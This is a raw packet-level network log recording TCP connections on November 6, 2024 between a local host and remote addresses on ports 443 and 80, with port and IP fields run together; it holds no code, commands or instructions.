                                              Nov 6, 2024 17:02:55.033691883 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.052134037 CET5689280192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:55.118904114 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.119049072 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.119229078 CET56893443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.119256973 CET56893443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.119270086 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.119282961 CET56893443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.119287968 CET4435689313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.121922016 CET56900443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.121968985 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.122031927 CET56900443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.122186899 CET56900443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.122201920 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.167068005 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.167356014 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.167449951 CET56894443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.167475939 CET56894443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.167486906 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.167501926 CET56894443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.167507887 CET4435689413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.170386076 CET56901443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.170417070 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.170480013 CET56901443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.170634985 CET56901443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.170645952 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.234751940 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.235266924 CET56895443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.235287905 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.235744953 CET56895443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.235752106 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.308676004 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.309221029 CET56896443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.309231043 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.309775114 CET56896443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.309777975 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.433209896 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.434250116 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.434365034 CET56895443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.434612989 CET56895443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.434639931 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.434654951 CET56895443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.434659958 CET4435689513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.437469959 CET56902443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.437516928 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.437612057 CET56902443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.437819958 CET56902443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.437835932 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.447299957 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.447535992 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.447632074 CET56896443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.447913885 CET56896443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.447913885 CET56896443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.447926998 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.447938919 CET4435689613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.450473070 CET56903443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.450510979 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.450653076 CET56903443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.450747013 CET56903443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.450761080 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.607403994 CET44356898188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:55.609364033 CET56898443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:55.609388113 CET44356898188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:55.676589966 CET8056897193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:55.677902937 CET56904443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:55.677958965 CET44356904188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:55.678117037 CET56904443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:55.678613901 CET56904443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:55.678625107 CET44356904188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:55.724025011 CET5689780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:55.772195101 CET44356898188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:55.772286892 CET44356898188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:55.772437096 CET56898443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:55.772844076 CET56898443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:55.776618004 CET5689280192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:55.777422905 CET5690580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:55.781922102 CET8056892193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:55.782001019 CET5689280192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:55.782538891 CET8056905193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:55.782793045 CET5690580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:55.782998085 CET5690580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:55.787868977 CET8056905193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:55.865813017 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.866272926 CET56900443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.866312027 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.867008924 CET56900443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.867021084 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.906584024 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.907063007 CET56901443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.907095909 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:55.907732964 CET56901443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:55.907737970 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.010636091 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.010730028 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.011287928 CET56900443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.011344910 CET56900443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.011363983 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.011379004 CET56900443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.011385918 CET4435690013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.014080048 CET56906443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.014117956 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.014219999 CET56906443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.014379978 CET56906443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.014389038 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.038109064 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.038395882 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.038585901 CET56901443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.038904905 CET56901443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.038925886 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.038999081 CET56901443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.039005041 CET4435690113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.042906046 CET56907443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.042949915 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.043055058 CET56907443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.043414116 CET56907443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.043427944 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.186507940 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.186975956 CET56903443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.187011003 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.187427044 CET56903443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.187432051 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.308145046 CET44356904188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:56.309866905 CET56904443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:56.309907913 CET44356904188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:56.314908981 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.315160990 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.315234900 CET56903443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.315335035 CET56903443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.315335035 CET56903443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.315382004 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.315397024 CET4435690313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.318080902 CET56908443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.318131924 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.318223000 CET56908443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.318368912 CET56908443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.318383932 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.330773115 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.331336975 CET56902443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.331362009 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.331800938 CET56902443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.331805944 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.463682890 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.464061022 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.469881058 CET56902443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.469921112 CET56902443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.469935894 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.469954014 CET56902443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.469959021 CET4435690213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.472482920 CET56909443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.472516060 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.472654104 CET56909443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.472793102 CET56909443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.472805977 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.472815037 CET44356904188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:56.472881079 CET44356904188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:56.474148035 CET56904443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:56.474512100 CET56904443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:56.478338003 CET5691080192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:56.483280897 CET8056910193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:56.483475924 CET5691080192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:56.483591080 CET5691080192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:56.488797903 CET8056910193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:56.649746895 CET8056905193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:56.651416063 CET56911443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:56.651457071 CET44356911188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:56.651521921 CET56911443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:56.651779890 CET56911443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:56.651788950 CET44356911188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:56.692775965 CET5690580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:56.772711039 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.773199081 CET56907443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.773232937 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.773669958 CET56907443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.773677111 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.842351913 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.842885017 CET56906443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.842914104 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.843342066 CET56906443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.843349934 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.903131962 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.903992891 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.904061079 CET56907443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.904122114 CET56907443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.904122114 CET56907443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.904145956 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.904159069 CET4435690713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.906928062 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.906955957 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.907017946 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.907159090 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.907172918 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.976655006 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.976797104 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.976996899 CET56906443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.977107048 CET56906443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.977127075 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.977138996 CET56906443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.977144957 CET4435690613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.979729891 CET56913443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.979749918 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:56.979835987 CET56913443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.980101109 CET56913443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:56.980113029 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.056740046 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.057295084 CET56908443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.057329893 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.057759047 CET56908443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.057766914 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.539729118 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.539800882 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.539854050 CET56908443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.540019989 CET56908443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.540019989 CET56908443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.540038109 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.540047884 CET4435690813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.540529966 CET8056910193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:57.542493105 CET56914443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:57.542526007 CET44356914188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:57.542591095 CET56914443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:57.543055058 CET56914443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:57.543066978 CET44356914188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:57.543144941 CET44356911188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:57.543607950 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.543618917 CET56915443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.543661118 CET4435691513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.543711901 CET56915443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.543895006 CET56909443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.543910980 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.544420004 CET56909443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.544425011 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.544770002 CET56915443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.544790030 CET4435691513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.545021057 CET56911443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:57.545037031 CET44356911188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:57.564851046 CET8056910193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:57.564898968 CET5691080192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:57.673804045 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.674438000 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.674468994 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.674911022 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.674916983 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.681308031 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.681832075 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.681924105 CET56909443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.681958914 CET56909443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.681958914 CET56909443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.681974888 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.681986094 CET4435690913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.684634924 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.684654951 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.684721947 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.684848070 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.684860945 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.713875055 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.713902950 CET44356911188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:57.714158058 CET44356911188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:57.714313030 CET56911443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:57.714349985 CET56913443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.714375019 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.714607000 CET56911443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:57.714828968 CET56913443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.714837074 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.809902906 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.809921980 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.809963942 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.810029030 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.810075045 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.810285091 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.810309887 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.810323954 CET56912443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.810331106 CET4435691213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.813261986 CET56917443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.813313007 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.813503981 CET56917443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.813577890 CET56917443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.813585997 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.843621969 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.843769073 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.843839884 CET56913443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.843992949 CET56913443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.844027996 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.844043016 CET56913443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.844049931 CET4435691313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.847009897 CET56918443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.847047091 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:57.847156048 CET56918443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.847366095 CET56918443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:57.847377062 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.182554960 CET44356914188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:58.184503078 CET56914443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:58.184529066 CET44356914188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:58.359781027 CET44356914188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:58.359862089 CET44356914188.114.96.3192.168.2.6
                                              Nov 6, 2024 17:02:58.359922886 CET56914443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:58.360460043 CET56914443192.168.2.6188.114.96.3
                                              Nov 6, 2024 17:02:58.363879919 CET5691080192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:58.365209103 CET5691980192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:58.369462967 CET8056910193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:58.369546890 CET5691080192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:58.370109081 CET8056919193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:58.370182991 CET5691980192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:58.370336056 CET5691980192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:58.375880003 CET8056919193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:58.416131973 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.416898012 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.416917086 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.417371035 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.417376995 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.545676947 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.545706034 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.545747995 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.545759916 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.545787096 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.545826912 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.550126076 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.550138950 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.550148964 CET56916443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.550153971 CET4435691613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.553416014 CET56920443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.553447962 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.553523064 CET56920443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.553761005 CET56920443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.553772926 CET4435692013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.571782112 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.572267056 CET56917443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.572282076 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.572770119 CET56917443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.572777987 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.594846010 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.595335007 CET56918443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.595344067 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.595820904 CET56918443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.595824957 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.703609943 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.703630924 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.703676939 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.703739882 CET56917443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.703952074 CET56917443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.703975916 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.703989983 CET56917443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.703998089 CET4435691713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.706732988 CET56921443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.706765890 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.706835985 CET56921443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.707005024 CET56921443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.707015038 CET4435692113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.723889112 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.723903894 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.723947048 CET4435691813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:58.724030972 CET56918443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:58.724075079 CET56918443192.168.2.613.107.246.45
